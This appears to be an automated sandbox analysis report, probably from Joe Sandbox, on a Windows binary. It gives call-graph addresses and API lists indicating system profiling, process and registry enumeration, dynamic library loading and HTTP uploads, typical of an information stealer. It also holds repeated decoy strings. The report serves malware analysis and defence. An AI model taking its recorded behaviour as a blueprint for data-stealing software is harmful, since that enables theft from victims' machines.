15077->15080 15081 1308ba 15078->15081 15079->15055 15082 130a28 15080->15082 15095->15063 15415 13a7a0 lstrcpy 15414->15415 15416 121683 15415->15416 15417 13a7a0 lstrcpy 15416->15417 15418 121695 15417->15418 15419 13a7a0 lstrcpy 15418->15419 15420 1216a7 15419->15420 15421 13a7a0 lstrcpy 15420->15421 15422 1215a3 15421->15422 15422->14298 15424 1247c6 15423->15424 15425 124838 lstrlen 15424->15425 15426 13aad0 15425->15426 15427 124848 InternetCrackUrlA 15426->15427 15428 124867 15427->15428 15428->14375 15430 13a740 lstrcpy 15429->15430 15431 138b74 15430->15431 15432 13a740 lstrcpy 15431->15432 15433 138b82 GetSystemTime 15432->15433 15435 138b99 15433->15435 15434 13a7a0 lstrcpy 15436 138bfc 15434->15436 15435->15434 15436->14390 15438 13a931 15437->15438 15439 13a988 15438->15439 15441 13a968 lstrcpy lstrcat 15438->15441 15440 13a7a0 lstrcpy 15439->15440 15442 13a994 15440->15442 15441->15439 15442->14394 15444 124e13 HttpSendRequestA 15443->15444 15444->14509 15446 124eee 15445->15446 15447 129af9 LocalAlloc 15445->15447 15446->14396 15446->14399 15447->15446 15448 129b14 CryptStringToBinaryA 15447->15448 15448->15446 15449 129b39 LocalFree 15448->15449 15449->15446 15578 1377a0 15450->15578 15453 1376c6 RegOpenKeyExA 15455 1376e7 RegQueryValueExA 15453->15455 15456 137704 RegCloseKey 15453->15456 15454 131c1e 15454->14751 15455->15456 15456->15454 15458 131c99 15457->15458 15458->14765 15460 131e09 15459->15460 15460->14807 15462 131e84 15461->15462 15463 137a9a wsprintfA 15461->15463 15462->14821 15463->15462 15465 131efe 15464->15465 15466 137b4d 15464->15466 15465->14835 15585 138d20 LocalAlloc CharToOemW 15466->15585 15469 13a740 lstrcpy 15468->15469 15470 137bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15469->15470 15479 137c25 15470->15479 15471 137c46 GetLocaleInfoA 15471->15479 15472 137d18 15473 137d28 15472->15473 15474 137d1e LocalFree 15472->15474 15476 13a7a0 lstrcpy 15473->15476 15474->15473 15475 13a9b0 lstrcpy lstrlen lstrcpy lstrcat 15475->15479 15478 137d37 15476->15478 15477 13a8a0 lstrcpy 15477->15479 15478->14848 15479->15471 15479->15472 15479->15475 15479->15477 15481 132008 15480->15481 15481->14863 15483 139493 GetModuleFileNameExA CloseHandle 15482->15483 15484 1394b5 15482->15484 15483->15484 15485 13a740 lstrcpy 15484->15485 15486 132091 15485->15486 15486->14878 15488 132119 15487->15488 15489 137e68 RegQueryValueExA 15487->15489 15488->14892 15490 137e8e RegCloseKey 15489->15490 15490->15488 15492 137fb9 GetLogicalProcessorInformationEx 15491->15492 15493 137fd8 GetLastError 15492->15493 15498 138029 15492->15498 15501 138022 15493->15501 15503 137fe3 15493->15503 15494 132194 15494->14906 15497 1389f0 2 API calls 15497->15494 15499 1389f0 2 API calls 15498->15499 15500 13807b 15499->15500 15500->15501 15502 138084 wsprintfA 15500->15502 15501->15494 15501->15497 15502->15494 15503->15492 15503->15494 15586 1389f0 15503->15586 15589 138a10 GetProcessHeap RtlAllocateHeap 15503->15589 15505 13220f 15504->15505 15505->14920 15507 1389b0 15506->15507 15508 13814d GlobalMemoryStatusEx 15507->15508 15511 138163 15508->15511 15509 13819b wsprintfA 15510 132289 15509->15510 15510->14934 15511->15509 15513 1387fb GetProcessHeap RtlAllocateHeap wsprintfA 15512->15513 15515 13a740 lstrcpy 15513->15515 15516 13230b 15515->15516 15516->14948 15518 13a740 lstrcpy 15517->15518 15522 138229 15518->15522 15519 138263 15521 13a7a0 lstrcpy 15519->15521 15520 13a9b0 lstrcpy lstrlen lstrcpy lstrcat 15520->15522 15523 1382dc 15521->15523 15522->15519 15522->15520 15524 13a8a0 lstrcpy 15522->15524 15523->14965 15524->15522 15526 13a740 lstrcpy 15525->15526 15527 13835c RegOpenKeyExA 15526->15527 15528 1383d0 15527->15528 15529 1383ae 15527->15529 15531 138613 RegCloseKey 15528->15531 15532 1383f8 RegEnumKeyExA 15528->15532 15530 13a7a0 lstrcpy 15529->15530 15541 1383bd 15530->15541 15535 13a7a0 lstrcpy 15531->15535 15533 13843f wsprintfA RegOpenKeyExA 15532->15533 15534 13860e 15532->15534 15536 1384c1 RegQueryValueExA 15533->15536 15537 138485 RegCloseKey RegCloseKey 15533->15537 15534->15531 15535->15541 15539 138601 RegCloseKey 15536->15539 15540 1384fa lstrlen 15536->15540 15538 13a7a0 lstrcpy 15537->15538 15538->15541 15539->15534 15540->15539 15542 138510 15540->15542 15541->14991 15543 13a9b0 4 API calls 15542->15543 15544 138527 15543->15544 15545 13a8a0 lstrcpy 15544->15545 15546 138533 15545->15546 15547 13a9b0 4 API calls 15546->15547 15548 138557 15547->15548 15549 13a8a0 lstrcpy 15548->15549 15550 138563 15549->15550 15551 13856e RegQueryValueExA 15550->15551 15551->15539 15552 1385a3 15551->15552 15553 13a9b0 4 API calls 15552->15553 15554 1385ba 15553->15554 15555 13a8a0 lstrcpy 15554->15555 15556 1385c6 15555->15556 15557 13a9b0 4 API calls 15556->15557 15558 1385ea 15557->15558 15559 13a8a0 lstrcpy 15558->15559 15560 1385f6 15559->15560 15560->15539 15562 13a740 lstrcpy 15561->15562 15563 1386bc CreateToolhelp32Snapshot Process32First 15562->15563 15564 1386e8 Process32Next 15563->15564 15565 13875d CloseHandle 15563->15565 15564->15565 15570 1386fd 15564->15570 15566 13a7a0 lstrcpy 15565->15566 15568 138776 15566->15568 15567 13a9b0 lstrcpy lstrlen lstrcpy lstrcat 15567->15570 15568->15023 15569 13a8a0 lstrcpy 15569->15570 15570->15564 15570->15567 15570->15569 15572 13a7a0 lstrcpy 15571->15572 15573 1351b5 15572->15573 15574 121590 lstrcpy 15573->15574 15575 1351c6 15574->15575 15590 125100 15575->15590 15577 1351cf 15577->15035 15581 137720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15578->15581 15580 1376b9 15580->15453 15580->15454 15582 137780 RegCloseKey 15581->15582 15583 137765 RegQueryValueExA 15581->15583 15584 137793 15582->15584 15583->15582 15584->15580 15585->15465 15587 1389f9 GetProcessHeap HeapFree 15586->15587 15588 138a0c 15586->15588 15587->15588 15588->15503 15589->15503 15591 13a7a0 lstrcpy 15590->15591 15592 125119 15591->15592 15593 1247b0 2 API calls 15592->15593 15594 125125 15593->15594 15750 138ea0 15594->15750 15596 125184 15597 125192 lstrlen 15596->15597 15598 1251a5 15597->15598 15599 138ea0 4 API calls 15598->15599 15600 1251b6 15599->15600 15601 13a740 lstrcpy 15600->15601 15602 1251c9 15601->15602 15603 13a740 lstrcpy 15602->15603 15604 1251d6 15603->15604 15605 13a740 lstrcpy 15604->15605 15606 1251e3 15605->15606 15607 13a740 lstrcpy 15606->15607 15608 1251f0 15607->15608 15609 13a740 lstrcpy 15608->15609 15610 1251fd InternetOpenA StrCmpCA 15609->15610 15611 12522f 15610->15611 15612 1258c4 InternetCloseHandle 15611->15612 15613 138b60 3 API calls 15611->15613 15619 1258d9 ctype 15612->15619 15614 12524e 15613->15614 15615 13a920 3 API calls 15614->15615 15616 125261 15615->15616 15617 13a8a0 lstrcpy 15616->15617 15618 12526a 15617->15618 15620 13a9b0 4 API calls 15618->15620 15622 13a7a0 lstrcpy 15619->15622 15621 1252ab 15620->15621 15623 13a920 3 API calls 15621->15623 15631 125913 15622->15631 15624 1252b2 15623->15624 15625 13a9b0 4 API calls 15624->15625 15626 1252b9 15625->15626 15627 13a8a0 lstrcpy 15626->15627 15628 1252c2 15627->15628 15629 13a9b0 4 API calls 15628->15629 15630 125303 15629->15630 15632 13a920 3 API calls 15630->15632 15631->15577 15633 12530a 15632->15633 15634 13a8a0 lstrcpy 15633->15634 15635 125313 15634->15635 15636 125329 InternetConnectA 15635->15636 15636->15612 15637 125359 HttpOpenRequestA 15636->15637 15639 1258b7 InternetCloseHandle 15637->15639 15640 1253b7 15637->15640 15639->15612 15641 13a9b0 4 API calls 15640->15641 15642 1253cb 15641->15642 15643 13a8a0 lstrcpy 15642->15643 15644 1253d4 15643->15644 15645 13a920 3 API calls 15644->15645 15646 1253f2 15645->15646 15647 13a8a0 lstrcpy 15646->15647 15648 1253fb 15647->15648 15649 13a9b0 4 API calls 15648->15649 15650 12541a 15649->15650 15651 13a8a0 lstrcpy 15650->15651 15652 125423 15651->15652 15653 13a9b0 4 API calls 15652->15653 15654 125444 15653->15654 15655 13a8a0 lstrcpy 15654->15655 15656 12544d 15655->15656 15657 13a9b0 4 API calls 15656->15657 15658 12546e 15657->15658 15751 138ea9 15750->15751 15752 138ead CryptBinaryToStringA 15750->15752 15751->15596 15752->15751 15753 138ece GetProcessHeap RtlAllocateHeap 15752->15753 15753->15751 15754 138ef4 ctype 15753->15754 15755 138f05 CryptBinaryToStringA 15754->15755 15755->15751 15998 129880 15756->15998 15758 1298e1 15758->15045 15760 13a740 lstrcpy 15759->15760 15761 12fb16 15760->15761 15933 13a740 lstrcpy 15932->15933 15934 130266 15933->15934 15935 138de0 2 API calls 15934->15935 15936 13027b 15935->15936 15937 13a920 3 API calls 15936->15937 15938 13028b 15937->15938 15939 13a8a0 lstrcpy 15938->15939 15940 130294 15939->15940 15941 13a9b0 4 API calls 15940->15941 15942 1302b8 15941->15942 15999 12988e 15998->15999 16002 126fb0 15999->16002 16001 1298ad ctype 16001->15758 16005 126d40 16002->16005 16006 126d63 16005->16006 16016 126d59 16005->16016 16021 126530 16006->16021 16010 126dbe 16010->16016 16031 1269b0 16010->16031 16012 126e2a 16013 126ee6 VirtualFree 16012->16013 16015 126ef7 16012->16015 16012->16016 16013->16015 16014 126f41 16014->16016 16019 1389f0 2 API calls 16014->16019 16015->16014 16017 126f26 FreeLibrary 16015->16017 16018 126f38 16015->16018 16016->16001 16017->16015 16020 1389f0 2 API calls 16018->16020 16019->16016 16020->16014 16022 126542 16021->16022 16024 126549 16022->16024 16041 138a10 GetProcessHeap RtlAllocateHeap 16022->16041 16024->16016 16025 126660 16024->16025 16028 12668f VirtualAlloc 16025->16028 16027 126730 16029 126743 VirtualAlloc 16027->16029 16030 12673c 16027->16030 16028->16027 16028->16030 16029->16030 16030->16010 16032 1269c9 16031->16032 16036 1269d5 16031->16036 16033 126a09 LoadLibraryA 16032->16033 16032->16036 16034 126a32 16033->16034 16033->16036 16040 126ae0 16034->16040 16042 138a10 GetProcessHeap RtlAllocateHeap 16034->16042 16036->16012 16037 126ba8 GetProcAddress 16037->16036 16037->16040 16038 1389f0 2 API calls 16038->16040 16039 126a8b 16039->16036 16039->16038 16040->16036 16040->16037 16041->16024 16042->16039

                          Executed Functions

                          Function 00139860 Relevance: 65.0, APIs: 33, Strings: 4, Instructions: 212libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 660 139860-139874 call 139750 663 139a93-139af2 LoadLibraryA * 5 660->663 664 13987a-139a8e call 139780 GetProcAddress * 21 660->664 665 139af4-139b08 GetProcAddress 663->665 666 139b0d-139b14 663->666 664->663 665->666 668 139b46-139b4d 666->668 669 139b16-139b41 GetProcAddress * 2 666->669 671 139b68-139b6f 668->671 672 139b4f-139b63 GetProcAddress 668->672 669->668 673 139b71-139b84 GetProcAddress 671->673 674 139b89-139b90 671->674 672->671 673->674 675 139b92-139bbc GetProcAddress * 2 674->675 676 139bc1-139bc2 674->676 675->676
                          APIs
                          • GetProcAddress.KERNEL32(76210000,00F01540), ref: 001398A1
                          • GetProcAddress.KERNEL32(76210000,00F01420), ref: 001398BA
                          • GetProcAddress.KERNEL32(76210000,00F01450), ref: 001398D2
                          • GetProcAddress.KERNEL32(76210000,00F01438), ref: 001398EA
                          • GetProcAddress.KERNEL32(76210000,00F014B0), ref: 00139903
                          • GetProcAddress.KERNEL32(76210000,00F099B8), ref: 0013991B
                          • GetProcAddress.KERNEL32(76210000,00EF5730), ref: 00139933
                          • GetProcAddress.KERNEL32(76210000,00EF57F0), ref: 0013994C
                          • GetProcAddress.KERNEL32(76210000,00F01558), ref: 00139964
                          • GetProcAddress.KERNEL32(76210000,00F01480), ref: 0013997C
                          • GetProcAddress.KERNEL32(76210000,00F015A0), ref: 00139995
                          • GetProcAddress.KERNEL32(76210000,00F01498), ref: 001399AD
                          • GetProcAddress.KERNEL32(76210000,00EF5AB0), ref: 001399C5
                          • GetProcAddress.KERNEL32(76210000,00F01600), ref: 001399DE
                          • GetProcAddress.KERNEL32(76210000,00F014C8), ref: 001399F6
                          • GetProcAddress.KERNEL32(76210000,00EF5AD0), ref: 00139A0E
                          • GetProcAddress.KERNEL32(76210000,00F01570), ref: 00139A27
                          • GetProcAddress.KERNEL32(76210000,00F01618), ref: 00139A3F
                          • GetProcAddress.KERNEL32(76210000,00EF5830), ref: 00139A57
                          • GetProcAddress.KERNEL32(76210000,00F01690), ref: 00139A70
                          • GetProcAddress.KERNEL32(76210000,00EF56F0), ref: 00139A88
                          • LoadLibraryA.KERNEL32(00F01708,?,00136A00), ref: 00139A9A
                          • LoadLibraryA.KERNEL32(00F016A8,?,00136A00), ref: 00139AAB
                          • LoadLibraryA.KERNEL32(00F016C0,?,00136A00), ref: 00139ABD
                          • LoadLibraryA.KERNEL32(00F016D8,?,00136A00), ref: 00139ACF
                          • LoadLibraryA.KERNEL32(00F016F0,?,00136A00), ref: 00139AE0
                          • GetProcAddress.KERNEL32(75B30000,00F01720), ref: 00139B02
                          • GetProcAddress.KERNEL32(751E0000,00F01660), ref: 00139B23
                          • GetProcAddress.KERNEL32(751E0000,00F01678), ref: 00139B3B
                          • GetProcAddress.KERNEL32(76910000,00F09ED8), ref: 00139B5D
                          • GetProcAddress.KERNEL32(75670000,00EF5A50), ref: 00139B7E
                          • GetProcAddress.KERNEL32(77310000,00F09A78), ref: 00139B9F
                          • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00139BB6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: 0W$0X$NtQueryInformationProcess$PZ
                          • API String ID: 2238633743-3542321927
                          • Opcode ID: 82ca0a9764306a9175be24a2beb7ca02a5b0355f0f45467cdfe033d063ef2a0c
                          • Instruction ID: 614679c99423c9862a666fad4b6f31916b63a8d8283405dfd32c011538b07139
                          • Opcode Fuzzy Hash: 82ca0a9764306a9175be24a2beb7ca02a5b0355f0f45467cdfe033d063ef2a0c
                          • Instruction Fuzzy Hash: 02A15BB5500A409FD346EFA8EE889563BFDF78C301F04C51AE615A3264D7F9A841EF22
                          Function 001245C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 764 1245c0-124695 RtlAllocateHeap 781 1246a0-1246a6 764->781 782 12474f-1247a9 VirtualProtect 781->782 783 1246ac-12474a 781->783 783->781
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0012460F
                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0012479C
                          Strings
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00124638
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001246AC
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001246C2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0012466D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0012474F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001246CD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0012477B
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00124678
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00124622
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0012471E
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0012475A
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001245F3
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00124713
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001245D2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00124662
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00124765
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00124770
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001245C7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001246B7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0012473F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001245E8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001245DD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001246D8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00124617
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00124729
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00124657
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00124643
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00124734
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0012462D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00124683
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-2218711628
                          • Opcode ID: 06862ecdb7568f373b31deba42b2292a22309125b759e709bd0f0cdd7dd05822
                          • Instruction ID: edbaebadb7c2b9bb81da8238907b1aee1b8cdec7f550f1ee9ca0e796e684db48
                          • Opcode Fuzzy Hash: 06862ecdb7568f373b31deba42b2292a22309125b759e709bd0f0cdd7dd05822
                          • Instruction Fuzzy Hash: AA41FF607C36047BE73ABFA4A852F9D76E7DF46B88F509054B804972D2CBB0A5808537
                          Function 00124880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 801 124880-124942 call 13a7a0 call 1247b0 call 13a740 * 5 InternetOpenA StrCmpCA 816 124944 801->816 817 12494b-12494f 801->817 816->817 818 124955-124acd call 138b60 call 13a920 call 13a8a0 call 13a800 * 2 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a920 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a920 call 13a8a0 call 13a800 * 2 InternetConnectA 817->818 819 124ecb-124ef3 InternetCloseHandle call 13aad0 call 129ac0 817->819 818->819 905 124ad3-124ad7 818->905 829 124f32-124fa2 call 138990 * 2 call 13a7a0 call 13a800 * 8 819->829 830 124ef5-124f2d call 13a820 call 13a9b0 call 13a8a0 call 13a800 819->830 830->829 906 124ae5 905->906 907 124ad9-124ae3 905->907 908 124aef-124b22 HttpOpenRequestA 906->908 907->908 909 124b28-124e28 call 13a9b0 call 13a8a0 call 13a800 call 13a920 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a920 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a920 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a920 call 13a8a0 call 13a800 call 13a740 call 13a920 * 2 call 13a8a0 call 13a800 * 2 call 13aad0 lstrlen call 13aad0 * 2 lstrlen call 13aad0 HttpSendRequestA 908->909 910 124ebe-124ec5 InternetCloseHandle 908->910 1021 124e32-124e5c InternetReadFile 909->1021 910->819 1022 124e67-124eb9 InternetCloseHandle call 13a800 1021->1022 1023 124e5e-124e65 1021->1023 1022->910 1023->1022 1024 124e69-124ea7 call 13a9b0 call 13a8a0 call 13a800 1023->1024 1024->1021
                          APIs
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
